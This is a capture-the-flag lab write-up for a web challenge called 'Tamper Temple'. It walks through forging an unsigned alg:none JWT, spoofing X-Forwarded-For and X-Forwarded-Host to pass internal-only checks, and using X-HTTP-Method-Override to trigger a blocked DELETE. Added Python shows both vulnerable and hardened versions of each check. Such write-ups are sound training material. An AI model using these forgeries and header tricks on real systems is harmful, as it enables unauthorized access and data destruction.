Tamper Temple

Temple Trust runs its order desk behind 'The Temple' — a freshly hardened portal bolted onto a v1 API nobody ever dared retire, watched over by 'developerDave', who's leaving and means to do damage on the way out. You're handed bob/temple123 to get through the front gate.

Room Description

Tamper Temple — figure 1

https://dashboard.webverselabs-pro.com/events/tamper-temple

Briefing

Temple Trust runs its order desk behind "The Temple" — a freshly hardened portal bolted onto a v1 API nobody ever dared retire, watched over by a scribe, "developerDave", who's leaving and means to do damage on the way out. You're handed a guest account — bob / temple123 — to get through the front gate. Slip past the older gods behind it and convince the Temple you're admin before the production ledger walks out the door.

Initial Analysis

This one is a themed story challenge, so the narrative itself carries the hints.

Tamper Temple — figure 2

Scroll down and read the whole home page; the lore doubles as the briefing.

Tamper Temple — figure 3

It more or less tells us what to expect: HTTP verb tampering is going to feature.

From the page source we have the navigation menu:

      <nav class="nav">
        <a href="/" class="hide-sm">Sanctum</a>
        <a href="/dev/" class="hide-sm">Dev</a>
        
          <a href="/login" class="btn btn-ghost" style="padding:8px 16px;">Enter</a>
        
      </nav>

And the two calls to action, "Enter the Temple" and "Read the Wards":

    <div class="cta fade d3">
      <a class="btn btn-gold" href="/login">Enter the Temple →</a>
      <a class="btn btn-ghost" href="/robots.txt">Read the Wards</a>
    </div>

While logged out, navigating to /dev gives us an access denied message telling us to log in first.

Tamper Temple — figure 4

/robots.txt lists the /dev/ endpoint, but nothing else.

Tamper Temple — figure 5

Let's go ahead and login with the credentials given to us:

bob:temple123
Tamper Temple — figure 6

We get a JWT. It is short, so the payload probably holds little more than a claim or two.

Tamper Temple — figure 7

The dashboard has a new look to it, and we have access to new endpoints.

Tamper Temple — figure 8

Infra Logs takes us to a /logs endpoint that is reserved for staff. We'll need to find a staff username and go after the JWT.

Tamper Temple — figure 9

Dev Artifacts takes us over to /dev and this time around we do have access, and there's a notes.txt file available for us.

Tamper Temple — figure 10

    DEV TODO (MUST FIX IN THIS ORDER !!!)
    --------
    - 404 error leaks internal username + our legacy token settings. FIX THIS (Pentest report said this is CRITICAL)
    - The girl mentioned in the 404 error said she was able to get to /logs somehow???
    - dave_token.txt is locked down to the developer workstation IP only. Does this need fixing?

And lastly, we have the API reference page:

Tamper Temple — figure 11
Tamper Temple — figure 12

Two actions are listed as restricted, and there is a deprecated version of the service still around. We love to see that.

Finding the bug

Let's go ahead and make a call to /api/v2/me and see what our role is with our JWT.

Tamper Temple — figure 13

Not that simple: the call is rejected. Let's follow the notes file and trigger a 404 by requesting a page that doesn't exist.

Tamper Temple — figure 14

Alrighty, so there is a user called alice, and the leaked legacy token settings tell us which JWT attack to use: alg:none, i.e. the server still accepts unsigned tokens.

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification

Exploitation

We can do the forgery in jwt.io, since it's just an algorithm swap: set alg to none, change the user to alice, and drop the signature (the trailing dot stays).

Tamper Temple — figure 15

    eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWxpY2UifQ.

Open DevTools, go to Application, replace the value of our session cookie with this token and refresh the dashboard.
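As an added example (not part of the original writeup and not the challenge's code), here is the same forgery done in plain Python, next to a toy verifier in both forms: the vulnerable one, which lets the token's header choose the algorithm, and a pinned one that refuses anything but the algorithm the server expects. The HS256 secret is a constructed placeholder; the Temple's real signing key is unknown.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple


def b64url(raw: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_jwt(claims: dict, key: Optional[bytes] = None, alg: str = "HS256") -> str:
    """Build a JWT; alg='none' produces an unsigned token with an empty third segment."""
    header = {"alg": alg, "typ": "JWT"}
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(claims, separators=(",", ":")).encode())
    if alg == "HS256":
        sig = b64url(hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest())
    elif alg == "none":
        sig = ""  # unsigned: the token keeps its trailing dot
    else:
        raise ValueError(f"unsupported alg {alg}")
    return f"{h}.{p}.{sig}"


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Header and payload without checking the signature (inspection only)."""
    h, p, _ = token.split(".")
    return json.loads(unb64url(h)), json.loads(unb64url(p))


def verify_legacy(token: str, key: bytes) -> Optional[dict]:
    """Vulnerable: trusts the alg named in the header, so alg=none skips the check."""
    h, p, sig = token.split(".")
    header = json.loads(unb64url(h))
    if header.get("alg") == "none":
        return json.loads(unb64url(p))
    expected = b64url(hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest())
    return json.loads(unb64url(p)) if hmac.compare_digest(expected, sig) else None


def verify_pinned(token: str, key: bytes) -> Optional[dict]:
    """Hardened: the server decides the algorithm; the header must match it."""
    h, p, sig = token.split(".")
    header = json.loads(unb64url(h))
    if header.get("alg") != "HS256":
        return None
    expected = b64url(hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest())
    return json.loads(unb64url(p)) if hmac.compare_digest(expected, sig) else None


# Constructed secret for the demo; the challenge's real key is unknown.
DEMO_KEY = b"constructed-demo-secret"


def forge_alice() -> str:
    """Reproduces the token shown above: alg none, payload {"user":"alice"}, no signature."""
    return encode_jwt({"user": "alice"}, alg="none")


if __name__ == "__main__":
    bob = encode_jwt({"user": "bob"}, DEMO_KEY)
    alice = forge_alice()
    print("signed bob token  :", bob)
    print("forged alice token:", alice)
    print("legacy verifier accepts forged token:", verify_legacy(alice, DEMO_KEY))
    print("pinned verifier accepts forged token:", verify_pinned(alice, DEMO_KEY))
```

The forged string is byte-for-byte the one jwt.io produced above, which is the point: nothing secret is needed to mint it, only a verifier that still honours the header's alg.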

Tamper Temple — figure 16

Great, now we have a staff role, we can open up /logs.

Tamper Temple — figure 17

Yikes, internal access only. The check is on where the request appears to come from, and that can be spoofed when the application trusts proxy headers.

Behind a load balancer or reverse proxy, the back end usually learns the original client address from X-Forwarded-For and the original Host from X-Forwarded-Host. If the application trusts those headers from anyone, rather than only from its own proxy, we can supply them ourselves and pick whichever value the check wants to see.

https://portswigger.net/web-security/host-header/exploiting

As we've already discussed, websites are often accessed via some kind of intermediary system, such as a load balancer or a reverse proxy. In this kind of architecture, the Host header that the back-end server receives may contain the domain name for one of these intermediary systems. This is usually not relevant for the requested functionality.

To solve this problem, the front-end may inject the X-Forwarded-Host header, containing the original value of the Host header from the client's initial request. For this reason, when an X-Forwarded-Host header is present, many frameworks will refer to this instead. You may observe this behavior even when there is no front-end that uses this header.

You can sometimes use X-Forwarded-Host to inject your malicious input while circumventing any validation on the Host header itself.

A useful gist with header and value combinations to try:

https://gist.githubusercontent.com/kaimi-/6b3c99538dce9e3d29ad647b325007c1/raw/921b0dd64e01c31106ece6087a3582e2d6fc6bc2/gistfile1.txt

So, let's add in X-Forwarded-Host in our Request.

Tamper Temple — figure 18

Hm, localhost doesn't work; let's try 127.0.0.1 instead.

That does indeed work!

Tamper Temple — figure 19
Tamper Temple — figure 20

Does this mean we can reach the locked-down file under /dev by sending the developer workstation IP we just saw in the X-Forwarded-For header? Let's give it a go.

Tamper Temple — figure 21

That's exactly right: same attack, different value. Let's take a look at dave_token.txt.
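An added example, not from the writeup and not the Temple's code, of the kind of source-address check that fails this way and how to write it so it doesn't. The internal range, the attacker address and the trusted proxy are constructed. The hardened resolver only honours X-Forwarded-For when the TCP peer is a known proxy, and reads the chain right to left so it takes the hop the proxy appended rather than the one the client wrote. A Host-name based check fed from X-Forwarded-Host has the same shape and the same fix.

```python
import ipaddress

# Constructed values: the range the /logs check treats as internal, and our own reverse proxy.
INTERNAL_NETS = [ipaddress.ip_network("127.0.0.0/8")]
TRUSTED_PROXIES = {"10.0.0.2"}


def is_internal(addr: str) -> bool:
    """True when addr parses as an IP inside INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # "localhost" is a name, not an address, so it fails (as seen above)
    return any(ip in net for net in INTERNAL_NETS)


def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """Vulnerable: the first hop of X-Forwarded-For is whatever the client put there."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr


def client_ip_hardened(remote_addr: str, headers: dict, trusted=TRUSTED_PROXIES) -> str:
    """Only trust X-Forwarded-For when the peer is one of our proxies, then walk the chain
    from the right, skipping our own proxies: the first untrusted hop is the real client."""
    if remote_addr not in trusted:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted:
            return hop
    return remote_addr


def logs_allowed(resolver, remote_addr: str, headers: dict) -> bool:
    """The /logs gate: internal callers only, with the caller decided by `resolver`."""
    return is_internal(resolver(remote_addr, headers))


if __name__ == "__main__":
    attacker = "203.0.113.5"  # constructed
    spoof = {"X-Forwarded-For": "127.0.0.1"}
    print("naive, spoofed header   :", logs_allowed(client_ip_naive, attacker, spoof))
    print("hardened, direct hit    :", logs_allowed(client_ip_hardened, attacker, spoof))
    via_proxy = {"X-Forwarded-For": "127.0.0.1, " + attacker}
    print("hardened, via our proxy :", logs_allowed(client_ip_hardened, "10.0.0.2", via_proxy))
```

The naive resolver reproduces both results from the figures: "localhost" is rejected because it is not an address, and "127.0.0.1" opens the door. The hardened one ignores the header on a direct connection and, behind the real proxy, sees the attacker's address that the proxy appended on the right.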

Tamper Temple — figure 22

Aha, that explains why our API call failed: the API expects tokens with a different structure.

Tamper Temple — figure 23

Yup, the payload carries a role claim as well, not just a username.

From our previous failed request towards /api/v2/me, we can just change the Authorization header with our new token.

Tamper Temple — figure 24

    {"sub": "developerDave", "role": "developer", "private_notes": "I'm leaving the company soon, so I'm going to cause some damage before I go. The team has a vuln they can't patch: the API still honors X-HTTP-Method-Override, and the old /api/v1/ service was never retired. I just need to figure out how the admin's password is being sent. Production data lives behind /api/v2/production."}

Okay, we definitely know the next steps now, but before that, let's try one of the other API actions.

Tamper Temple — figure 25
Tamper Temple — figure 26

Our developer role isn't enough. Luckily we have Dave's private notes, and the warning label in the API reference hints at trying /audit on /api/v1 as well.

Tamper Temple — figure 27

No dice. Given the name of the challenge, and that we haven't yet had to change the request method (GET, POST, PUT, DELETE and so on), maybe this is the moment (plus the hints surely aren't red herrings).

Tamper Temple — figure 28

    user=admin pass=th3-s4cr3d-scr0ll-0f-anubis

Well well well. Let's log in with our new credentials, but this time we have to go through the other, vulnerable, API endpoint.

Tamper Temple — figure 29
Tamper Temple — figure 30

The credentials work with both API versions, so we don't need to be specific.

We got a new token with the following values:

Tamper Temple — figure 31

Let's make a request to the last available API action, not forgetting to put the new token in the Authorization header.

Tamper Temple — figure 32

Well, that looks pretty empty; nothing of value to see here. The reference did say the endpoint also takes a DELETE request, so let's try that.

Tamper Temple — figure 33

Alright, this is where the last part of Dave's private notes comes in:

    The team has a vuln they can't patch: the API still honors X-HTTP-Method-Override

https://www.tempest.com.br/sidechannel/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it

We just add the following header to our previous GET request:

    X-HTTP-Method-Override: DELETE

and voila:

Tamper Temple — figure 34

The flag is bundled up there with the response headers.
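As an added example (constructed, not the Temple's code), here is the shape of the bug Dave describes: a front-door rule that only looks at the method on the wire, with a back end that honours X-HTTP-Method-Override on every request, beside a resolver that accepts the override only on POST and re-applies the rule to the effective verb. The path, the rule and the response strings are placeholders.

```python
# Constructed rule: the gateway refuses DELETE on the production ledger.
GATEWAY_DENY = {("/api/v2/production", "DELETE")}
OVERRIDE_HEADER = "X-HTTP-Method-Override"


def effective_method_vulnerable(method: str, headers: dict) -> str:
    """Honours the override on any request, so a GET on the wire becomes a DELETE inside."""
    return headers.get(OVERRIDE_HEADER, method).upper()


def effective_method_hardened(method: str, headers: dict) -> str:
    """If tunnelling is needed at all, accept the override only on POST and only for the
    verbs being tunnelled; every other request keeps its wire method."""
    override = headers.get(OVERRIDE_HEADER, "").upper()
    if method.upper() == "POST" and override in {"PUT", "PATCH", "DELETE"}:
        return override
    return method.upper()


def handle(method: str, path: str, headers: dict, resolve, recheck: bool = False):
    """Gateway and back end in one function. `resolve` picks the effective verb;
    `recheck` re-applies the gateway rule to that verb, which the vulnerable
    deployment never does."""
    if (path, method.upper()) in GATEWAY_DENY:
        return 403, "forbidden at gateway"
    verb = resolve(method, headers)
    if recheck and (path, verb) in GATEWAY_DENY:
        return 403, "forbidden after override"
    if path == "/api/v2/production":
        if verb == "GET":
            return 200, "[]"
        if verb == "DELETE":
            return 200, "ledger deleted"
        return 405, "method not allowed"
    return 404, "not found"


if __name__ == "__main__":
    prod = "/api/v2/production"
    tamper = {OVERRIDE_HEADER: "DELETE"}
    print("wire DELETE, vulnerable :", handle("DELETE", prod, {}, effective_method_vulnerable))
    print("GET + override, vuln    :", handle("GET", prod, tamper, effective_method_vulnerable))
    print("GET + override, hardened:", handle("GET", prod, tamper, effective_method_hardened, recheck=True))
    print("POST + override, hardened:", handle("POST", prod, tamper, effective_method_hardened, recheck=True))
```

The gateway blocks a real DELETE, exactly as the figure shows, and the same GET with the override header walks straight past it. The cleanest fix is to strip the header at the edge or drop override support entirely; the hardened resolver is for applications that cannot, and even then the access rule has to run on the effective verb, not the one on the wire.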